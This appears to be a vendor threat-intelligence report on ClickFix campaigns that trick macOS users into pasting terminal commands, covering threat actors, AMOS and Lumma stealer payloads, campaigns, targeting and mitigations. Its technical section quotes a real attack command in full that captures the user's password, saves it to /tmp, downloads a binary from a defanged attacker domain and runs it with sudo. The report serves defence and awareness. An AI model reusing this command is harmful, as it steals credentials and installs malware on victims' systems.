Executive Summary

ClickFix attacks represent a significant and rapidly evolving threat vector targeting macOS users, leveraging advanced social engineering and multi-platform payload delivery. These attacks utilize deceptive verification pages, dynamic OS detection, and psychological manipulation to coerce users into executing malicious terminal commands. The primary objective is credential theft, data exfiltration, and the deployment of sophisticated malware such as Atomic macOS Stealer (AMOS) and Lumma Stealer. Recent campaigns have demonstrated a marked increase in both scale and technical sophistication, with active exploitation observed across North America and Europe. The threat landscape is further complicated by the involvement of multiple advanced persistent threat (APT) groups and cybercriminal syndicates, making ClickFix a critical concern for organizations and individuals operating within the macOS ecosystem.

Threat Actor Profile

The ClickFix attack methodology has been adopted by a diverse array of threat actors, including both financially motivated cybercriminals and state-aligned APT groups. Notably, Microsoft has attributed recent campaigns to groups tracked as Storm-1607, Storm-0426, and Storm-0249. These actors are characterized by their agility in adopting new social engineering techniques and their ability to rapidly weaponize emerging vulnerabilities. Russian-speaking cybercriminal forums have been identified as primary distribution hubs for AMOS and related stealer malware, with actors leveraging underground marketplaces to disseminate payloads and share attack infrastructure. The operational tempo of these groups is high, with campaigns frequently pivoting between different lures, payloads, and delivery mechanisms to maximize infection rates and evade detection.

Technical Analysis of Malware/TTPs

ClickFix attacks are distinguished by their use of dynamic, OS-aware landing pages that generate tailored payloads based on the victim's environment. Upon visiting a compromised or malicious site, users are presented with a fake verification or CAPTCHA page, often branded to mimic trusted services such as Cloudflare or Google reCAPTCHA. JavaScript on the page detects the user's operating system and presents a corresponding command for the user to execute in their terminal (for macOS and Linux) or PowerShell/Run dialog (for Windows).

For macOS users, the attack chain typically involves a command sequence that prompts for the user's system password, validates it, and then downloads and executes a malicious binary. A representative command observed in the wild is as follows:

bash username=$(whoami) while true; do read -s -p "System Password: " password echo dscl . -authonly "$username" "$password" && break done echo "$password" > /tmp/.pass curl -o /tmp/update hxxps[:]//applemacios[.]com/getrur/update echo "$password" | sudo -S xattr -c /tmp/update chmod +x /tmp/update /tmp/update

This sequence captures the user's password, stores it locally, retrieves the AMOS payload from a remote server, removes quarantine attributes, and executes the binary with elevated privileges. The AMOS stealer is capable of exfiltrating browser credentials, cryptocurrency wallet data, and detailed system information. Additional payloads observed include Lumma Stealer, Lampion, and various remote access trojans (RATs) such as Xworm and AsyncRAT.

On Windows systems, analogous techniques are employed using PowerShell or MSHTA to fetch and execute payloads, often leveraging living-off-the-land binaries (LOLBins) to evade endpoint detection. The attack infrastructure is highly modular, with command-and-control (C2) domains and payload URLs frequently rotated to avoid blacklisting.

Exploitation in the Wild

Active ClickFix campaigns have been documented since early 2025, with a notable surge in activity targeting macOS users in May and June. One high-profile campaign impersonated Spectrum, a major US internet service provider, redirecting users to fake verification pages that delivered the AMOS stealer. The Lampion campaign targeted government and financial institutions in Portugal, Switzerland, France, Hungary, and Mexico, leveraging compromised WordPress sites and malvertising to distribute payloads.

The OBSCURE#BAT campaign utilized Discord-themed lures to deliver the r77 rootkit and other malware, demonstrating the adaptability of ClickFix techniques across different social engineering themes. Microsoft and other security vendors have observed a marked increase in the use of video tutorials, countdown timers, and real-time "user verification" counters to enhance the credibility of malicious landing pages and increase user compliance.

Victimology and Targeting

ClickFix attacks exhibit broad targeting, with a focus on sectors including government, finance, education, transportation, and enterprise environments. End-user devices are particularly vulnerable due to the reliance on user interaction for payload execution. Geographically, the United States, Canada, Portugal, Switzerland, Luxembourg, France, Hungary, Mexico, and Germany have been disproportionately affected, reflecting both the global reach of the campaigns and the attackers' preference for high-value targets.

The attack is not dependent on specific macOS versions; any system capable of executing terminal commands and downloading files via curl or wget is at risk. This includes macOS Sonoma (14.x), Ventura (13.x), Monterey (12.x), Big Sur (11.x), Catalina (10.15), Mojave (10.14), and High Sierra (10.13), among others.

Mitigation and Countermeasures

Mitigating ClickFix attacks requires a multi-layered approach combining technical controls, user education, and proactive threat hunting. Organizations should monitor for suspicious clipboard and terminal activity, particularly commands involving curl, wget, or password prompts. Blocking known indicators of compromise (IOCs) at both the network and endpoint level is essential, as is hunting for unusual process launches such as /tmp/update on macOS or PowerShell with encoded commands on Windows.

User awareness is critical: no legitimate service will ever request that users execute terminal commands for verification purposes. Regular security training should emphasize the dangers of copying and pasting commands from untrusted sources. All content management system (CMS) plugins, especially for platforms like WordPress, should be kept up to date to prevent site compromise and subsequent malvertising.

Endpoint detection and response (EDR) and extended detection and response (XDR) solutions, such as Microsoft Defender and Sentinel, have developed specific detections for ClickFix-related behaviors. Organizations are encouraged to leverage these tools and to implement custom detection rules based on the latest threat intelligence.

References

Microsoft Security Blog: ClickFix Analysis, eSecurity Planet: ClickFix Malware Evolves, CloudSEK: AMOS via ClickFix, Securonix: OBSCURE#BAT Analysis

About Rescana

Rescana delivers advanced third-party risk management (TPRM) solutions, empowering organizations to proactively identify, assess, and mitigate cyber threats across their digital supply chain. Our platform leverages real-time intelligence, automated risk scoring, and comprehensive reporting to enhance your organization's security posture and resilience against emerging threats. For further information or to discuss how Rescana can support your cybersecurity strategy, we are happy to answer questions at ops@rescana.com.